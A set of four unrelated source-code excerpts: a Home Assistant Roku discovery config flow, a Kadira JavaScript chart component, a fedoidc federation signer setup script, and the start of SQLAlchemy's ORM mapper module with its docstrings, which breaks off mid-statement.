await self.async_set_unique_id(serial_number)
self._abort_if_unique_id_configured(updates={CONF_HOST: host})
# pylint: disable=no-member # https://github.com/PyCQA/pylint/issues/3167
self.context.update({"title_placeholders": {"name": name}})
self.discovery_info.update({CONF_HOST: host, CONF_NAME: name})
try:
await validate_input(self.hass, self.discovery_info)
except RokuError:
_LOGGER.debug("Roku Error", exc_info=True)
return self.async_abort(reason=ERROR_CANNOT_CONNECT)
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Unknown error trying to connect")
return self.async_abort(reason=ERROR_UNKNOWN)
return await self.async_step_discovery_confirm()
async def async_step_discovery_confirm(
self, user_input: Optional[Dict] = None
) -> Dict[str, Any]:
"""Handle user-confirmation of discovered device."""
# pylint: disable=no-member # https://github.com/PyCQA/pylint/issues/3167
if user_input is None:
return self.async_show_form(
step_id="discovery_confirm",
description_placeholders={"name": self.discovery_info[CONF_NAME]},
errors={},
)
return self.async_create_entry(
title=self.discovery_info[CONF_NAME],
data=self.discovery_info,
)
def _host_already_configured(self, host):
"""See if we already have a hub with the host address configured."""
existing_hosts = {
entry.data[CONF_HOST]
for entry in self._async_current_entries()
if CONF_HOST in entry.data
}
return host in existing_hosts
|
var component = FlowComponents.define('hbar.breakdown', function(props) {
this.setFn('sortOptions', props.sortOptionsFn);
this.setFn('selectedItem', props.selectedItemFn);
this.setFn('commonValueLabel', props.commonValueLabelFn);
this.metricDataKey = props.metricDataKey;
this.autorun(function() {
var args = this.getArgs(props);
var sorts = props.sortOptionsFn();
var sortBy = this.getSortedMetric(sorts);
args.sortBy = sortBy;
this.set('sortedItem', sortBy);
this.kdFindMetrics('breakdown', this.metricDataKey, args);
});
this.autorun(function() {
var selection = this.getSelectionArg();
this.set('selectedItem', selection);
});
});
component.state.chartData = function() {
var self = this;
var data = this.kdMetrics('breakdown').fetch() || [];
var hbarData = [];
var sortedValueMax = getMaxValue('sortedValue');
var commonValueMax = getMaxValue('commonValue');
data.forEach(function(d) {
var obj = {
id: d.id,
sortedValueTitle: d.sortValueTitle,
sortedValue: d.sortedValue,
pSortedValue: getPct(d.sortedValue, sortedValueMax)
};
if (d.commonValue !== undefined) {
obj.commonValueTitle = self.get('commonValueLabel');
obj.commonValue = d.commonValue;
obj.pCommonValue = getPct(d.commonValue, commonValueMax);
}
hbarData.push(obj);
});
function getMaxValue(key) {
var valueMax = _.max(data, function(obj) {
return obj[key];
});
return valueMax[key];
}
function getPct(value, maxValue) {
return value / maxValue * 100;
}
return hbarData;
};
component.state.isChartLoading = function() {
return !this.kdMetrics('breakdown').ready();
};
component.action.changeSortOrder = function(sort) {
FlowRouter.setQueryParams({ metric: sort });
};
component.action.changeSelection = function(selection) {
FlowRouter.setQueryParams({ selection: selection });
};
component.extend(KadiraData.FlowMixin);
component.extend(Mixins.Params);
|
import importlib
import os
import sys
from urllib.parse import quote_plus
from urllib.parse import unquote_plus
from fedoidc.bundle import FSJWKSBundle
from fedoidc.bundle import keyjar_to_jwks_private
from fedoidc.file_system import FileSystem
from fedoidc.operator import Operator
from fedoidc.signing_service import InternalSigningService
from fedoidc.signing_service import Signer
from fedoidc.test_utils import make_fs_jwks_bundle
from fedoidc.test_utils import make_signed_metadata_statement
from oic.utils.keyio import build_keyjar
def create_signers(jb, ms_path, csms_def, fos):
signers = {}
for sig, use_def in csms_def.items():
ms_spec = {}
for usage, spec in use_def.items():
ms_spec[usage] = os.path.join(ms_path, quote_plus(sig), usage)
signers[sig] = Signer(InternalSigningService(sig, jb[sig]), ms_spec)
for fo in fos:
signers[fo] = Signer(InternalSigningService(fo, jb[fo]))
return signers
def setup(keydefs, tool_iss, liss, csms_def, oa, ms_path):
sig_keys = build_keyjar(keydefs)[1]
key_bundle = make_fs_jwks_bundle(tool_iss, liss, sig_keys, keydefs, './')
sig_keys = build_keyjar(keydefs)[1]
jb = FSJWKSBundle(tool_iss, sig_keys, 'fo_jwks',
key_conv={'to': quote_plus, 'from': unquote_plus})
# Need to save the private parts
jb.bundle.value_conv['to'] = keyjar_to_jwks_private
jb.bundle.sync()
operator = {}
for entity, _keyjar in jb.items():
operator[entity] = Operator(iss=entity, keyjar=_keyjar)
signers = {}
for sig, sms_def in csms_def.items():
ms_dir = os.path.join(ms_path, sig)
metadata_statements = FileSystem(ms_dir)
for name, spec in sms_def.items():
res = make_signed_metadata_statement(spec, operator)
metadata_statements[name] = res['ms']
_iss = oa[sig]
signers[_iss] = Signer(
InternalSigningService(_iss, operator[_iss].keyjar), ms_dir)
return signers, key_bundle
def fed_setup(args):
sys.path.insert(0, ".")
config = importlib.import_module(args.fed_config)
_liss = []
_liss.extend(list(config.FO.values()))
_liss.extend(list(config.OA.values()))
_liss.extend(list(config.IA.values()))
_liss.extend(list(config.EO.values()))
return setup(config.KEY_DEFS, config.TOOL_ISS, _liss, config.SMS_DEF,
config.OA, args.ms_path)
|
# orm/mapper.py
# Copyright (C) 2005-2019 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Logic to map Python classes to and from selectables.
Defines the :class:`~sqlalchemy.orm.mapper.Mapper` class, the central
configurational unit which associates a class with a database table.
This is a semi-private module; the main configurational API of the ORM is
available in :class:`~sqlalchemy.orm.`.
"""
from __future__ import absolute_import
from collections import deque
from itertools import chain
import sys
import types
import weakref
from . import attributes
from . import exc as orm_exc
from . import instrumentation
from . import loading
from . import properties
from . import util as orm_util
from .base import _class_to_mapper
from .base import _INSTRUMENTOR
from .base import _state_mapper
from .base import class_mapper
from .base import state_str
from .interfaces import _MappedAttribute
from .interfaces import EXT_SKIP
from .interfaces import InspectionAttr
from .interfaces import MapperProperty
from .path_registry import PathRegistry
from .. import event
from .. import exc as sa_exc
from .. import inspection
from .. import log
from .. import schema
from .. import sql
from .. import util
from ..sql import expression
from ..sql import operators
from ..sql import util as sql_util
from ..sql import visitors
_mapper_registry = weakref.WeakKeyDictionary()
_already_compiling = False
_memoized_configured_property = util.group_expirable_memoized_property()
# a constant returned by _get_attr_by_column to indicate
# this mapper is not handling an attribute for a particular
# column
NO_ATTRIBUTE = util.symbol("NO_ATTRIBUTE")
# lock used to synchronize the "mapper configure" step
_CONFIGURE_MUTEX = util.threading.RLock()
@inspection._self_inspects
@log.class_logger
class Mapper(InspectionAttr):
"""Define the correlation of class attributes to database table
columns.
The :class:`.Mapper` object is instantiated using the
:func:`~sqlalchemy.orm.mapper` function. For information
about instantiating new :class:`.Mapper` objects, see
that function's documentation.
When :func:`.mapper` is used
explicitly to link a user defined class with table
metadata, this is referred to as *classical mapping*.
Modern SQLAlchemy usage tends to favor the
:mod:`sqlalchemy.ext.declarative` extension for class
configuration, which
makes usage of :func:`.mapper` behind the scenes.
Given a particular class known to be mapped by the ORM,
the :class:`.Mapper` which maintains it can be acquired
using the :func:`.inspect` function::
from sqlalchemy import inspect
mapper = inspect(MyClass)
A class which was mapped by the :mod:`sqlalchemy.ext.declarative`
extension will also have its mapper available via the ``__mapper__``
attribute.
"""
_new_mappers = False
_dispose_called = False
def __init__(
self,
class_,
local_table=None,
properties=None,
primary_key=None,
non_primary=False,
inherits=None,
inherit_condition=None,
inherit_foreign_keys=None,
extension=None,
order_by=False,
always_refresh=False,
version_id_col=None,
version_id_generator=None,
polymorphic_on=None,
_polymorphic_map=None,
polymorphic_identity=None,
concrete=False,
with_polymorphic=None,
polymorphic_load=None,
allow_partial_pks=True,
batch=True,
column_prefix=None,
include_properties=None,
exclude_properties=None,
passive_updates=True,
passive_deletes=False,
confirm_deleted_rows=True,
eager_defaults=False,
legacy_is_orphan=False,
_compiled_cache_size=100,
):
r"""Return a new :class:`~.Mapper` object.
This function is typically used behind the scenes
via the Declarative extension. When using Declarative,
many of the usual :func:`.mapper` arguments are handled
by the Declarative extension itself, including ``class_``,
``local_table``, ``properties``, and ``inherits``.
Other options are passed to :func:`.mapper` using
the ``__mapper_args__`` class variable::
class MyClass(Base):
__tablename__ = 'my_table'
id = Column(Integer, primary_key=True)
type = Column(String(50))
alt = Column("some_alt", Integer)
__mapper_args__ = {
'polymorphic_on' : type
}
Explicit use of :func:`.mapper`
is often referred to as *classical mapping*. The above
declarative example is equivalent in classical form to::
my_table = Table("my_table", metadata,
Column('id', Integer, primary_key=True),
Column('type', String(50)),
Column("some_alt", Integer)
)
class MyClass(object):
pass
mapper(MyClass, my_table,
polymorphic_on=my_table.c.type,
properties={
'alt':my_table.c.some_alt
})
.. seealso::
:ref:`classical_mapping` - discussion of direct usage of
:func:`.mapper`
:param class\_: The class to be mapped. When using Declarative,
this argument is automatically passed as the declared class
itself.
:param local_table: The :class:`.Table` or other selectable
to which the class is mapped. May be ``None`` if
this mapper inherits from another mapper using single-table
inheritance. When using Declarative, this argument is
automatically passed by the extension, based on what
is configured via the ``__table__`` argument or via the
:class:`.Table` produced as a result of the ``__tablename__``
and :class:`.Column` arguments present.
:param always_refresh: If True, all query operations for this mapped
class will overwrite all data within object instances that already
exist within the session, erasing any in-memory changes with
whatever information was loaded from the database. Usage of this
flag is highly discouraged; as an alternative, see the method
:meth:`.Query.populate_existing`.
:param allow_partial_pks: Defaults to True. Indicates that a
composite primary key with some NULL values should be considered as
possibly existing within the database. This affects whether a
mapper will assign an incoming row to an existing identity, as well
as if :meth:`.Session.merge` will check the database first for a
particular primary key value. A "partial primary key" can occur if
one has mapped to an OUTER JOIN, for example.
:param batch: Defaults to ``True``, indicating that save operations
of multiple entities can be batched together for efficiency.
Setting to False indicates
that an instance will be fully saved before saving the next
instance. This is used in the extremely rare case that a
:class:`.MapperEvents` listener requires being called
in between individual row persistence operations.
:param column_prefix: A string which will be prepended
to the mapped attribute name when :class:`.Column`
objects are automatically assigned as attributes to the
mapped class. Does not affect explicitly specified
column-based properties.
See the section :ref:`column_prefix` for an example.
:param concrete: If True, indicates this mapper should use concrete
table inheritance with its parent mapper.
See the section :ref:`concrete_inheritance` for an example.
:param confirm_deleted_rows: defaults to True; when a DELETE occurs
of one more rows based on specific primary keys, a warning is
emitted when the number of rows matched does not equal the number
of rows expected. This parameter may be set to False to handle the
case where database ON DELETE CASCADE rules may be deleting some of
those rows automatically. The warning may be changed to an
exception in a future release.
.. versionadded:: 0.9.4 - added
:paramref:`.mapper.confirm_deleted_rows` as well as conditional
matched row checking on delete.
:param eager_defaults: if True, the ORM will immediately fetch the
value of server-generated default values after an INSERT or UPDATE,
rather than leaving them as expired to be fetched on next access.
This can be used for event schemes where the server-generated values
are needed immediately before the flush completes. By default,
this scheme will emit an individual ``SELECT`` statement per row
inserted or updated, which note can add significant performance
overhead. However, if the
target database supports :term:`RETURNING`, the default values will
be returned inline with the INSERT or UPDATE statement, which can
greatly enhance performance for an application that needs frequent
access to just-generated server defaults.
.. seealso::
:ref:`orm_server_defaults`
.. versionchanged:: 0.9.0 The ``eager_defaults`` option can now
make use of :term:`RETURNING` for backends which support it.
:param exclude_properties: A list or set of string column names to
be excluded from mapping.
See :ref:`include_exclude_cols` for an example.
:param extension: A :class:`.MapperExtension` instance or
list of :class:`.MapperExtension` instances which will be applied
to all operations by this :class:`.Mapper`.
.. deprecated:: 0.7
:class:`.MapperExtension` is deprecated in favor of the
:class:`.MapperEvents` listener interface. The
:paramref:`.mapper.extension` parameter will be
removed in a future release.
:param include_properties: An inclusive list or set of string column
names to map.
See :ref:`include_exclude_cols` for an example.
:param inherits: A mapped class or the corresponding :class:`.Mapper`
of one indicating a superclass to which this :class:`.Mapper`
should *inherit* from. The mapped class here must be a subclass
of the other mapper's class. When using Declarative, this argument
is passed automatically as a result of the natural class
hierarchy of the declared classes.
.. seealso::
:ref:`inheritance_toplevel`
:param inherit_condition: For joined table inheritance, a SQL
expression which will
define how the two tables are joined; defaults to a natural join
between the two tables.
:param inherit_foreign_keys: When ``inherit_condition`` is used and
the columns present are missing a :class:`.ForeignKey`
configuration, this parameter can be used to specify which columns
are "foreign". In most cases can be left as ``None``.
:param legacy_is_orphan: Boolean, defaults to ``False``.
When ``True``, specifies that "legacy" orphan consideration
is to be applied to objects mapped by this mapper, which means
that a pending (that is, not persistent) object is auto-expunged
from an owning :class:`.Session` only when it is de-associated
from *all* parents that specify a ``delete-orphan`` cascade towards
this mapper. The new default behavior is that the object is
auto-expunged when it is de-associated with *any* of its parents
that specify ``delete-orphan`` cascade. This behavior is more
consistent with that of a persistent object, and allows behavior to
be consistent in more scenarios independently of whether or not an
orphanable object has been flushed yet or not.
See the change note and example at :ref:`legacy_is_orphan_addition`
for more detail on this change.
.. versionadded:: 0.8 - the consideration of a pending object as
an "orphan" has been modified to more closely match the
behavior as that of persistent objects, which is that the object
is expunged from the :class:`.Session` as soon as it is
de-associated from any of its orphan-enabled parents. Previously,
the pending object would be expunged only if de-associated
from all of its orphan-enabled parents. The new flag
``legacy_is_orphan`` is added to :func:`.orm.mapper` which
re-establishes the legacy behavior.
:param non_primary: Specify that this :class:`.Mapper` is in addition
to the "primary" mapper, that is, the one used for persistence.
The :class:`.Mapper` created here may be used for ad-hoc
mapping of the class to an alternate selectable, for loading
only.
:paramref:`.Mapper.non_primary` is not an often used option, but
is useful in some specific :func:`.relationship` cases.
.. seealso::
:ref:`relationship_non_primary_mapper`
:param order_by: A single :class:`.Column` or list of :class:`.Column`
objects for which selection operations should use as the default
ordering for entities. By default mappers have no pre-defined
ordering.
.. deprecated:: 1.1 The :paramref:`.Mapper.order_by` parameter
is deprecated, and will be removed in a future release.
Use :meth:`.Query.order_by` to determine the ordering of a
result set.
:param passive_deletes: Indicates DELETE behavior of foreign key
columns when a joined-table inheritance entity is being deleted.
Defaults to ``False`` for a base mapper; for an inheriting mapper,
defaults to ``False`` unless the value is set to ``True``
on the superclass mapper.
When ``True``, it is assumed that ON DELETE CASCADE is configured
on the foreign key relationships that link this mapper's table
to its superclass table, so that when the unit of work attempts
to delete the entity, it need only emit a DELETE statement for the
superclass table, and not this table.
When ``False``, a DELETE statement is emitted for this mapper's
table individually. If the primary key attributes local to this
table are unloaded, then a SELECT must be emitted in order to
validate these attributes; note that the primary key columns
of a joined-table subclass are not part of the "primary key" of
the object as a whole.
Note that a value of ``True`` is **always** forced onto the
subclass mappers; that is, it's not possible for a superclass
to specify passive_deletes without this taking effect for
all subclass mappers.
.. versionadded:: 1.1
.. seealso::
:ref:`passive_deletes` - description of similar feature as
used with :func:`.relationship`
:paramref:`.mapper.passive_updates` - supporting ON UPDATE
CASCADE for joined-table inheritance mappers
:param passive_updates: Indicates UPDATE behavior of foreign key
columns when a primary key column changes on a joined-table
inheritance mapping. Defaults to ``True``.
When True, it is assumed that ON UPDATE CASCADE is configured on
the foreign key in the database, and that the database will handle
propagation of an UPDATE from a source column to dependent columns
on joined-table rows.
When False, it is assumed that the database does not enforce
referential integrity and will not be issuing its own CASCADE
operation for an update. The unit of work process will
emit an UPDATE statement for the dependent columns during a
primary key change.
.. seealso::
:ref:`passive_updates` - description of a similar feature as
used with :func:`.relationship`
:paramref:`.mapper.passive_deletes` - supporting ON DELETE
CASCADE for joined-table inheritance mappers
:param polymorphic_load: Specifies "polymorphic loading" behavior
for a subclass in an inheritance hierarchy (joined and single
table inheritance only). Valid values are:
* "'inline'" - specifies this class should be part of the
"with_polymorphic" mappers, e.g. its columns will be included
in a SELECT query against the base.
* "'selectin'" - specifies that when instances of this class
are loaded, an additional SELECT will be emitted to retrieve
the columns specific to this subclass. The SELECT uses
IN to fetch multiple subclasses at once.
.. versionadded:: 1.2
.. seealso::
:ref:`with_polymorphic_mapper_config`
:ref:`polymorphic_selectin`
:param polymorphic_on: Specifies the column, attribute, or
SQL expression used to determine the target class for an
incoming row, when inheriting classes are present.
This value is commonly a :class:`.Column` object that's
present in the mapped :class:`.Table`::
class Employee(Base):
__tablename__ = 'employee'
id = Column(Integer, primary_key=True)
discriminator = Column(String(50))
__mapper_args__ = {
"polymorphic_on":discriminator,
"polymorphic_identity":"employee"
}
It may also be specified
as a SQL expression, as in this example where we
use the :func:`.case` construct to provide a conditional
approach::
class Employee(Base):
__tablename__ = 'employee'
id = Column(Integer, primary_key=True)
discriminator = Column(String(50))
__mapper_args__ = {
"polymorphic_on":case([
(discriminator == "EN", "engineer"),
(discriminator == "MA", "manager"),
], else_="employee"),
"polymorphic_identity":"employee"
}
It may also refer to any attribute
configured with :func:`.column_property`, or to the
string name of one::
class Employee(Base):
__tablename__ = 'employee'
id = Column(Integer, primary_key=True)
discriminator = Column(String(50))
employee_type = column_property(
case([
(discriminator == "EN", "engineer"),
(discriminator == "MA", "manager"),
], else_="employee")
)
__mapper_args__ = {
"polymorphic_on":employee_type,
"polymorphic_identity":"employee"
}
.. versionchanged:: 0.7.4
``polymorphic_on`` may be specified as a SQL expression,
or refer to any attribute configured with
:func:`.column_property`, or to the string name of one.
When setting ``polymorphic_on`` to reference an
attribute or expression that's not present in the
locally mapped :class:`.Table`, yet the value
of the discriminator should be persisted to the database,
the value of the
discriminator is not automatically set on new
instances; this must be handled by the user,
either through manual means or via event listeners.
A typical approach to establishing such a listener
looks like::
from sqlalchemy import event
from sqlalchemy.orm import object_mapper
@event.listens_for(Employee, "init", propagate=True)
def set_identity(instance, *arg, **kw):
mapper = object_mapper(instance)
instance.discriminator = mapper.polymorphic_identity
Where above, we assign the value of ``polymorphic_identity``
for the mapped class to the ``discriminator`` attribute,
thus persisting the value to the ``discriminator`` column
in the database.
.. warning::
Currently, **only one discriminator column may be set**, typically
on the base-most class in the hierarchy. "Cascading" polymorphic
columns are not yet supported.
.. seealso::
:ref:`inheritance_toplevel`
:param polymorphic_identity: Specifies the value which
identifies this particular class as returned by the
column expression referred to by the ``polymorphic_on``
setting. As rows are received, the value corresponding
to the ``polymorphic_on`` column expression is compared
to this value, indicating which subclass should
be used for the newly reconstructed object.
:param properties: A dictionary mapping the string names of object
attributes to :class:`.MapperProperty` instances, which define the
persistence behavior of that attribute. Note that :class:`.Column`
objects present in
the mapped :class:`.Table` are automatically placed into
``ColumnProperty`` instances upon mapping, unless overridden.
When using Declarative, this argument is passed automatically,
based on all those :class:`.MapperProperty` instances declared
in the declared class body.
:param primary_key: A list of :class:`.Column` objects which define
the primary key to be used against this mapper's selectable unit.
This is normally simply the primary key of the ``local_table``, but
can be overridden here.
:param version_id_col: A :class:`.Column`
that will be used to keep a running version id of rows
in the table. This is used to detect concurrent updates or
the presence of stale data in a flush. The methodology is to
detect if an UPDATE statement does not match the last known
version id, a
:class:`~sqlalchemy.orm.exc.StaleDataError` exception is
thrown.
By default, the column must be of :class:`.Integer` type,
unless ``version_id_generator`` specifies an alternative version
generator.
.. seealso::
:ref:`mapper_version_counter` - discussion of version counting
and rationale.
:param version_id_generator: Define how new version ids should
be generated. Defaults to ``None``, which indicates that
a simple integer counting scheme be employed. To provide a custom
versioning scheme, provide a callable function of the form::
def generate_version(version):
return next_version
Alternatively, server-side versioning functions such as triggers,
or programmatic versioning schemes outside of the version id
generator may be used, by specifying the value ``False``.
Please see :ref:`server_side_version_counter` for a discussion
of important points when using this option.
.. versionadded:: 0.9.0 ``version_id_generator`` supports
server-side version number generation.
.. seealso::
:ref:`custom_version_counter`
:ref:`server_side_version_counter`
:param with_polymorphic: A tuple in the form ``(<classes>,
<selectable>)`` indicating the default style of "polymorphic"
loading, that is, which tables are queried at once. <classes> is
any single or list of mappers and/or classes indicating the
inherited classes that should be loaded at once. The special value
``'*'`` may be used to indicate all descending classes should be
loaded immediately. The second tuple argument <selectable>
indicates a selectable that will be used to query for multiple
classes.
.. seealso::
:ref:`with_polymorphic` - discussion of polymorphic querying
techniques.
"""
self.class_ = util.assert_arg_type(class_, type, "class_")
self.class_manager = None
self._primary_key_argument = util.to_list(primary_key)
self.non_primary = non_primary
if order_by is not False:
self.order_by = util.to_list(order_by)
util.warn_deprecated(
"Mapper.order_by is deprecated."
"Use Query.order_by() in order to affect the ordering of ORM "
"result sets."
)
else:
self.order_by = order_by
self.always_refresh = always_refresh
if isinstance(version_id_col, MapperProperty):
self.version_id_prop = version_id_col
self.version_id_col = None
else:
self.version_id_col = version_id_col
if version_id_generator is False:
self.version_id_generator = False
elif version_id_generator is None:
self.version_id_generator = lambda x: (x or 0) + 1
else:
self.version_id_generator = version_id_generator
self.concrete = concrete
self.single = False
self.inherits = inherits
self.local_table = local_table
self.inherit_condition = inherit_condition
self.inherit_foreign_keys = inherit_foreign_keys
self._init_properties = properties or {}
self._delete_orphans = []
self.batch = batch
self.eager_defaults = eager_defaults
self.column_prefix = column_prefix
self.polymorphic_on = expression._clause_element_as_expr(
polymorphic_on
)
self._dependency_processors = []
self.validators = util.immutabledict()
self.passive_updates = passive_updates
self.passive_deletes = passive_deletes
self.legacy_is_orphan = legacy_is_orphan
self._clause_adapter = None
self._requires_row_aliasing = False
self._inherits_equated_pairs = None
self._memoized_values = {}
self._compiled_cache_size = _compiled_cache_size
self._reconstructor = None
self._deprecated_extensions = util.to_list(extension or [])
self.allow_partial_pks = allow_partial_pks
if self.inherits and not self.concrete:
self.confirm_deleted_rows = False
else:
self.confirm_deleted_rows = confirm_deleted_rows
if isinstance(self.local_table, expression.SelectBase):
raise sa_exc.InvalidRequestError(
"When mapping against a select() construct, map against "
"an alias() of the construct instead."
"This because several databases don't allow a "
"SELECT from a subquery that does not have an alias."
)
self._set_with_polymorphic(with_polymorphic)
self.polymorphic_load = polymorphic_load
# our 'polymorphic identity', a string name that when located in a
# result set row indicates this Mapper should be used to construct
# the object instance for that row.
self.polymorphic_identity = polymorphic_identity
# a dictionary of 'polymorphic identity' names, associating those
# names with Mappers that will be used to construct object instances
# upon a select operation.
if _polymorphic_map is None:
self.polymorphic_map = {}
else:
self.polymorphic_map = _polymorphic_map
if include_properties is not None:
self.include_properties = util.to_set(include_properties)
else:
self.include_properties = None
if exclude_properties:
self.exclude_properties = util.to_set(exclude_properties)
else:
self.exclude_properties = None
self.configured = False
# prevent this mapper from being constructed
# while a configure_mappers() is occurring (and defer a
# configure_mappers() until construction succeeds)
_CONFIGURE_MUTEX.acquire()
try:
self.dispatch._events._new_mapper_instance(class_, self)
self._configure_inheritance()
self._configure_legacy_instrument_class()
self._configure_class_instrumentation()
self._configure_listeners()
self._configure_properties()
self._configure_polymorphic_setter()
self._configure_pks()
Mapper._new_mappers = True
self._log("constructed")
self._expire_memoizations()
finally:
_CONFIGURE_MUTEX.release()
# major attributes initialized at the classlevel so that
# they can be Sphinx-documented.
is_mapper = True
"""Part of the inspection API."""
represents_outer_join = False
@property
def mapper(self):
"""Part of the inspection API.
Returns self.
"""
return self
@property
def entity(self):
r"""Part of the inspection API.
Returns self.class\_.
"""
return self.class_
local_table = None
"""The :class:`.Selectable` which this :class:`.Mapper` manages.
Typically is an instance of :class:`.Table` or :class:`.Alias`.
May also be ``None``.
The "local" table is the
selectable that the :class:`.Mapper` is directly responsible for
managing from an attribute access and flush perspective. For
non-inheriting mappers, the local table is the same as the
"mapped" table. For joined-table inheritance mappers, local_table
will be the particular sub-table of the overall "join" which
this :class:`.Mapper` represents. If this mapper is a
single-table inheriting mapper, local_table will be ``None``.
.. seealso::
:attr:`~.Mapper.mapped_table`.
"""
mapped_table = None
"""The :class:`.Selectable` to which this :class:`.Mapper` is mapped.
Typically an instance of :class:`.Table`, :class:`.Join`, or
:class:`.Alias`.
The "mapped" table is the selectable that
the mapper selects from during queries. For non-inheriting
mappers, the mapped table is the same as the "local" table.
For joined-table inheritance mappers, mapped_table references the
full :class:`.Join` representing full rows for this particular
subclass. For single-table inheritance mappers, mapped_table
references the base table.
.. seealso::
:attr:`~.Mapper.local_table`.
"""
inherits = None
"""References the :class:`.Mapper` which this :class:`.Mapper`
inherits from, if any.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
configured = None
"""Represent ``True`` if this :class:`.Mapper` has been configured.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
.. seealso::
:func:`.configure_mappers`.
"""
concrete = None
"""Represent ``True`` if this :class:`.Mapper` is a concrete
inheritance mapper.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
tables = None
"""An iterable containing the collection of :class:`.Table` objects
which this :class:`.Mapper` is aware of.
If the mapper is mapped to a :class:`.Join`, or an :class:`.Alias`
representing a :class:`.Select`, the individual :class:`.Table`
objects that comprise the full construct will be represented here.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
primary_key = None
"""An iterable containing the collection of :class:`.Column` objects
which comprise the 'primary key' of the mapped table, from the
perspective of this :class:`.Mapper`.
This list is against the selectable in :attr:`~.Mapper.mapped_table`. In
the case of inheriting mappers, some columns may be managed by a
superclass mapper. For example, in the case of a :class:`.Join`, the
primary key is determined by all of the primary key columns across all
tables referenced by the :class:`.Join`.
The list is also not necessarily the same as the primary key column
collection associated with the underlying tables; the :class:`.Mapper`
features a ``primary_key`` argument that can override what the
:class:`.Mapper` considers as primary key columns.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
class_ = None
"""The Python class which this :class:`.Mapper` maps.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
class_manager = None
"""The :class:`.ClassManager` which maintains event listeners
and class-bound descriptors for this :class:`.Mapper`.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
single = None
"""Represent ``True`` if this :class:`.Mapper` is a single table
inheritance mapper.
:attr:`~.Mapper.local_table` will be ``None`` if this flag is set.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
non_primary = None
"""Represent ``True`` if this :class:`.Mapper` is a "non-primary"
mapper, e.g. a mapper that is used only to selet rows but not for
persistence management.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
polymorphic_on = None
"""The :class:`.Column` or SQL expression specified as the
``polymorphic_on`` argument
for this :class:`.Mapper`, within an inheritance scenario.
This attribute is normally a :class:`.Column` instance but
may also be an expression, such as one derived from
:func:`.cast`.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
polymorphic_map = None
"""A mapping of "polymorphic identity" identifiers mapped to
:class:`.Mapper` instances, within an inheritance scenario.
The identifiers can be of any type which is comparable to the
type of column represented by :attr:`~.Mapper.polymorphic_on`.
An inheritance chain of mappers will all reference the same
polymorphic map object. The object is used to correlate incoming
result rows to target mappers.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
polymorphic_identity = None
"""Represent an identifier which is matched against the
:attr:`~.Mapper.polymorphic_on` column during result row loading.
Used only with inheritance, this object can be of any type which is
comparable to the type of column represented by
:attr:`~.Mapper.polymorphic_on`.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
base_mapper = None
"""The base-most :class:`.Mapper` in an inheritance chain.
In a non-inheriting scenario, this attribute will always be this
:class:`.Mapper`. In an inheritance scenario, it references
the :class:`.Mapper` which is parent to all other :class:`.Mapper`
objects in the inheritance chain.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
columns = None
"""A collection of :class:`.Column` or other scalar expression
objects maintained by this :class:`.Mapper`.
The collection behaves the same as that of the ``c`` attribute on
any :class:`.Table` object, except that only those columns included in
this mapping are present, and are keyed based on the attribute name
defined in the mapping, not necessarily the ``key`` attribute of the
:class:`.Column` itself. Additionally, scalar expressions mapped
by :func:`.column_property` are also present here.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
validators = None
"""An immutable dictionary of attributes which have been decorated
using the :func:`~.orm.validates` decorator.
The dictionary contains string attribute names as keys
mapped to the actual validation method.
"""
c = None
"""A synonym for :attr:`~.Mapper.columns`."""
@util.memoized_property
def _path_registry(self):
return PathRegistry.per_mapper(self)
def _configure_inheritance(self):
"""Configure settings related to inherting and/or inherited mappers
being present."""
# a set of all mappers which inherit from this one.
self._inheriting_mappers = util.WeakSequence()
if self.inherits:
if isinstance(self.inherits, type):
self.inherits = class_mapper(self.inherits, configure=False)
if not issubclass(self.class_, self.inherits.class_):
raise sa_exc.ArgumentError(
"Class '%s' does not inherit from '%s'"
% (self.class_.__name__, self.inherits.class_.__name__)
)
if self.non_primary != self.inherits.non_primary:
np = not self.non_primary and "primary" or "non-primary"
raise sa_exc.ArgumentError(
"Inheritance of %s mapper for class '%s' is "
"only allowed from a %s mapper"
% (np, self.class_.__name__, np)
)
# inherit_condition is optional.
if self.local_table is None:
self.local_table = self.inherits.local_table
self.mapped_table = self.inherits.mapped_table
self.single = True
elif self.local_table is not self.inherits.local_table:
if self.concrete:
self.mapped_table = self.local_table
for mapper in self.iterate_to_root():
if mapper.polymorphic_on is not None:
mapper._requires_row_aliasing = True
else:
if self.inherit_condition is None:
# figure out inherit condition from our table to the
# immediate table of the inherited mapper, not its
# full table which could pull in other stuff we don't
# want (allows test/inheritance.InheritTest4 to pass)
self.inherit_condition = sql_util.join_condition(
self.inherits.local_table, self.local_table
)
self.mapped_table = sql.join(
self.inherits.mapped_table,
self.local_table,
self.inherit_condition,
)
fks = util.to_set(self.inherit_foreign_keys)
self._inherits_equated_pairs = sql_util.criterion_as_pairs(
self.mapped_table.onclause,
consider_as_foreign_keys=fks,
)
else:
self.mapped_table = self.local_table
if self.polymorphic_identity is not None and not self.concrete:
self._identity_class = self.inherits._identity_class
else:
self._identity_class = self.class_
if self.version_id_col is None:
self.version_id_col = self.inherits.version_id_col
self.version_id_generator = self.inherits.version_id_generator
elif (
self.inherits.version_id_col is not None
and self.version_id_col is not self.inherits.version_id_col
):
util.warn(
"Inheriting version_id_col '%s' does not match inherited "
"version_id_col '%s' and will not automatically populate "
"the inherited versioning column. "
"version_id_col should only be specified on "
"the base-most mapper that includes versioning."
% (
self.version_id_col.description,
self.inherits.version_id_col.description,
)
)
if (
self.order_by is False
